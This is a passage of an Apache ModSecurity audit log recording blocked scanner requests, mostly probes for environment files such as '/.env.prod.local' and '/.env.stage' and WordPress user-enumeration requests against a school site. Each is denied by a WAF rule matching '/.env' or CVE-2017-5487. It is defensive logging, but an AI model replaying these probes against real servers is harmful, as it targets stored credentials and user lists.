X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --bf4d9421-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf4d9421-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573767812938 680 (- - -) Stopwatch2: 1748573767812938 680; combined=259, p1=226, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf4d9421-Z-- --12886e76-A-- [30/May/2025:09:56:08 +0700] aDkeSBNBDSvkc-tIZOnfTAAAAFE 103.236.140.4 55876 103.236.140.4 8181 --12886e76-B-- GET /.env.prod.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --12886e76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12886e76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573768154202 648 (- - -) Stopwatch2: 1748573768154202 648; combined=266, p1=235, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12886e76-Z-- --a4bd0409-A-- [30/May/2025:09:56:08 +0700] aDkeSBNBDSvkc-tIZOnfTQAAAFA 103.236.140.4 55878 103.236.140.4 8181 --a4bd0409-B-- GET /.env.prod.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --a4bd0409-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4bd0409-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573768394808 674 (- - -) Stopwatch2: 1748573768394808 674; combined=275, p1=243, p2=0, p3=0, p4=0, p5=31, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4bd0409-Z-- --edcdaa61-A-- [30/May/2025:09:56:08 +0700] aDkeSIWl_OZMPH_FZ2DMXQAAAM0 103.236.140.4 55880 103.236.140.4 8181 --edcdaa61-B-- GET /.env.production.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --edcdaa61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --edcdaa61-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573768736404 664 (- - -) Stopwatch2: 1748573768736404 664; combined=256, p1=223, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --edcdaa61-Z-- --58342d6f-A-- [30/May/2025:09:56:08 +0700] aDkeSJxu2QkuXt3B9jaSGQAAAJU 103.236.140.4 55882 103.236.140.4 8181 --58342d6f-B-- GET /.env.production.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --58342d6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58342d6f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573768977078 683 (- - -) Stopwatch2: 1748573768977078 683; combined=280, p1=247, p2=0, p3=0, p4=0, p5=32, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58342d6f-Z-- --8e102414-A-- [30/May/2025:09:56:09 +0700] aDkeSRNBDSvkc-tIZOnfTgAAAFM 103.236.140.4 55884 103.236.140.4 8181 --8e102414-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --8e102414-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e102414-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573769317984 662 (- - -) Stopwatch2: 1748573769317984 662; combined=256, p1=224, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e102414-Z-- --7b83c75e-A-- [30/May/2025:09:56:09 +0700] aDkeSZxu2QkuXt3B9jaSGgAAAJM 103.236.140.4 55886 103.236.140.4 8181 --7b83c75e-B-- GET /.env.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --7b83c75e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b83c75e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573769558647 638 (- - -) Stopwatch2: 1748573769558647 638; combined=250, p1=218, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b83c75e-Z-- --bf99db2f-A-- [30/May/2025:09:56:09 +0700] aDkeSbW504ObxUT6Rrz0xgAAAAI 103.236.140.4 55888 103.236.140.4 8181 --bf99db2f-B-- GET /.env.example HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --bf99db2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf99db2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573769900295 669 (- - -) Stopwatch2: 1748573769900295 669; combined=257, p1=226, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf99db2f-Z-- --498af213-A-- [30/May/2025:09:56:10 +0700] aDkeShNBDSvkc-tIZOnfTwAAAFY 103.236.140.4 55890 103.236.140.4 8181 --498af213-B-- GET /.env.example HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --498af213-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --498af213-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573770140984 673 (- - -) Stopwatch2: 1748573770140984 673; combined=252, p1=221, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --498af213-Z-- --1a02c004-A-- [30/May/2025:09:56:10 +0700] aDkeSoWl_OZMPH_FZ2DMXgAAAMQ 103.236.140.4 55892 103.236.140.4 8181 --1a02c004-B-- GET /.env.stage HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --1a02c004-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a02c004-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573770482499 782 (- - -) Stopwatch2: 1748573770482499 782; combined=313, p1=273, p2=0, p3=0, p4=0, p5=40, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a02c004-Z-- --f756d13e-A-- [30/May/2025:09:56:10 +0700] aDkeSoWl_OZMPH_FZ2DMXwAAAMk 103.236.140.4 55894 103.236.140.4 8181 --f756d13e-B-- GET /.env.stage HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --f756d13e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f756d13e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573770724114 717 (- - -) Stopwatch2: 1748573770724114 717; combined=318, p1=285, p2=0, p3=0, p4=0, p5=33, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f756d13e-Z-- --e6267828-A-- [30/May/2025:10:35:38 +0700] aDknipxu2QkuXt3B9jaSMQAAAJQ 103.236.140.4 56144 103.236.140.4 8181 --e6267828-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.75.94.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.75.94.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e6267828-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e6267828-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748576138985793 1969 (- - -) Stopwatch2: 1748576138985793 1969; combined=962, p1=323, p2=613, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6267828-Z-- --1ead9b14-A-- [30/May/2025:10:45:42 +0700] aDkp5oWl_OZMPH_FZ2DMjAAAAMI 103.236.140.4 56250 103.236.140.4 8181 --1ead9b14-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 207.154.212.47 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 207.154.212.47 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --1ead9b14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ead9b14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748576742856018 849 (- - -) Stopwatch2: 1748576742856018 849; combined=352, p1=304, p2=0, p3=0, p4=0, p5=47, sr=87, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ead9b14-Z-- --eda7b30f-A-- [30/May/2025:10:50:46 +0700] aDkrFoWl_OZMPH_FZ2DMmgAAANQ 103.236.140.4 56304 103.236.140.4 8181 --eda7b30f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.58.159.188 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.58.159.188 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --eda7b30f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eda7b30f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748577046895809 734 (- - -) Stopwatch2: 1748577046895809 734; combined=295, p1=242, p2=0, p3=0, p4=0, p5=53, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eda7b30f-Z-- --e1b5e219-A-- [30/May/2025:10:51:42 +0700] aDkrTpxu2QkuXt3B9jaSPwAAAJE 103.236.140.4 56314 103.236.140.4 8181 --e1b5e219-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 27.147.132.42 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 27.147.132.42 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e1b5e219-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1b5e219-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748577102986208 2428 (- - -) Stopwatch2: 1748577102986208 2428; combined=1082, p1=373, p2=681, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1b5e219-Z-- --eb29d65b-A-- [30/May/2025:10:53:47 +0700] aDkry4Wl_OZMPH_FZ2DMwQAAAM8 103.236.140.4 56444 103.236.140.4 8181 --eb29d65b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.166.206.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.166.206.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --eb29d65b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb29d65b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748577227049012 2429 (- - -) Stopwatch2: 1748577227049012 2429; combined=1156, p1=403, p2=725, p3=0, p4=0, p5=27, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb29d65b-Z-- --04de5821-A-- [30/May/2025:11:05:00 +0700] aDkubBNBDSvkc-tIZOnfcwAAAEk 103.236.140.4 56516 103.236.140.4 8181 --04de5821-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 118.179.53.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.179.53.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --04de5821-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04de5821-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748577900080602 3283 (- - -) Stopwatch2: 1748577900080602 3283; combined=1430, p1=480, p2=917, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04de5821-Z-- --56321346-A-- [30/May/2025:11:14:22 +0700] aDkwnoWl_OZMPH_FZ2DMygAAAMU 103.236.140.4 56568 103.236.140.4 8181 --56321346-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.41.243.133 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.41.243.133 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --56321346-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56321346-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748578462587196 2461 (- - -) Stopwatch2: 1748578462587196 2461; combined=1135, p1=389, p2=717, p3=0, p4=0, p5=28, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56321346-Z-- --ff951d51-A-- [30/May/2025:12:04:06 +0700] aDk8RoWl_OZMPH_FZ2DRWAAAAMc 103.236.140.4 38238 103.236.140.4 8181 --ff951d51-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.225.163.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: 